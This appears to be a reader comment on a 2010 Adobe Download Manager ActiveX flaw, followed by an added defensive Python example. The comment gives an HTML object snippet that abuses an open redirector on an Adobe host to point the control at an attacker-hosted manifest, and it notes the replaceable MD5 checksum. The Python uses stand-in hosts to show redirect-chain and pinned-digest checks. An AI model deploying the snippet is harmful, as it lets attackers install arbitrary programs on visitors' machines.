
The second screenshot on the Register article makes the bug guessable. The control must whitelist *.adobe.com, then he uses the obvious open redirector on feeds.adobe.com to 302 to his exploit.

Looking at the download page, you just need a page that has this (didn't test):

<object id="GetActiveX" classid="clsid:E2883E8F-472F-4fb0-9522-AC9BF37916A7"
        codebase="http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab#Version=1,6,2,45"
        type="application/x-oleobject" width="1" height="1">
  <param name="Service-URL" value="http://feeds.adobe.com/controller.cfm?handler=PostHandler&action=click&postId=123&nextPage=http://yourdomain.com/file.txt" />
  <param name="itemid" value="calc" />
  <param name="core-product" value="calc" />
  <param name="dlmbanner" value="off" />
  <param name="language" value="" />
  <param name="os" value="" />
</object>

Where file.txt is formatted like this http://get.adobe.com/reader/webservices/dlm/?itemid=Reader_9.3_English_UK_for_Windows

Checksum is just the MD5 of that exe, so you can just replace it. You need to click the security bar and agree you want it to run, and it's only installed transiently. I guess I agree with Adobe: not the end of the world. Any user who will clicky that will agree to the "install control" warning as well and already has bonzibuddy.ocx

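The two weaknesses the comment describes, a host allow-list defeated by an open redirector on an allow-listed host and a checksum that travels in the same attacker-controlled manifest as the binary it is meant to protect, are easy to demonstrate from the defender's side. The following is an added example, not code from the comment, from Adobe or from the Download Manager; every host name, path, item id and payload in it is constructed, and redirect hops are simulated with a table so it runs offline. It contrasts a naive host check with one that validates every hop of the redirect chain, and a manifest-supplied digest with a pinned one.

```python
"""Allow-list and integrity checks for a download-manager "service URL".

Added example (constructed names only): shows why checking only the host of
the first URL is not enough when that host has an open redirector, and why a
digest carried inside an untrusted manifest gives no integrity guarantee.
"""
import hashlib
import hmac
from urllib.parse import urlsplit

# Constructed allow-list root; stands in for a vendor's domain.
ALLOWED_DOMAINS = ("vendor.example",)


def host_allowed(url: str) -> bool:
    """True if the URL's host is an allowed domain or a subdomain of it.

    The comparison is done on a label boundary, so 'notvendor.example' and
    'vendor.example.attacker.example' are both rejected.
    """
    host = (urlsplit(url).hostname or "").lower()
    return any(host == d or host.endswith("." + d) for d in ALLOWED_DOMAINS)


# Constructed redirect table: what an HTTP client would observe as 302s.
# The first entry models an open redirector on an allow-listed host.
REDIRECTS = {
    "http://feeds.vendor.example/redir?next=http://attacker.example/manifest.txt":
        "http://attacker.example/manifest.txt",
    "http://loop.vendor.example/a": "http://loop.vendor.example/b",
    "http://loop.vendor.example/b": "http://loop.vendor.example/a",
}


def follow_redirects(url: str, table=REDIRECTS, max_hops: int = 5) -> list:
    """Return every URL visited, ending at the first non-redirecting one."""
    chain = [url]
    while chain[-1] in table:
        if len(chain) > max_hops:
            raise ValueError("too many redirects")
        chain.append(table[chain[-1]])
    return chain


def naive_check(url: str) -> bool:
    """The weak control: only the host of the URL handed to the client."""
    return host_allowed(url)


def strict_check(url: str, table=REDIRECTS) -> bool:
    """Every hop, including the final destination, must be allow-listed."""
    try:
        chain = follow_redirects(url, table)
    except ValueError:
        return False
    return all(host_allowed(u) for u in chain)


# Constructed pinned digest, as shipped with the client or fetched over an
# authenticated channel; hypothetical item id.
GENUINE_PAYLOAD = b"genuine installer bytes (constructed)"
PINNED_SHA256 = {"Reader_example": hashlib.sha256(GENUINE_PAYLOAD).hexdigest()}


def verify_download(item_id: str, payload: bytes, manifest_digest: str):
    """Return (manifest_matches, pinned_matches).

    manifest_matches is what a client learns by trusting the digest in the
    manifest: whoever swaps the payload can swap that digest too, so it is
    always true for a consistent attacker. pinned_matches compares against a
    value the attacker does not control.
    """
    actual = hashlib.sha256(payload).hexdigest()
    manifest_matches = hmac.compare_digest(actual, manifest_digest)
    pinned = PINNED_SHA256.get(item_id)
    pinned_matches = pinned is not None and hmac.compare_digest(actual, pinned)
    return manifest_matches, pinned_matches


if __name__ == "__main__":
    redirector = "http://feeds.vendor.example/redir?next=http://attacker.example/manifest.txt"
    print("naive:", naive_check(redirector), "strict:", strict_check(redirector))
    swapped = b"attacker supplied bytes (constructed)"
    print(verify_download("Reader_example", swapped, hashlib.sha256(swapped).hexdigest()))
```

Running it shows the redirector URL passing the naive check and failing the strict one, and a swapped payload passing the manifest's own digest while failing the pinned comparison. In a real client the redirect chain would come from an HTTP library configured not to follow redirects automatically, so that each Location header can be validated before it is followed.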



Copyright © 2010 threatpost.com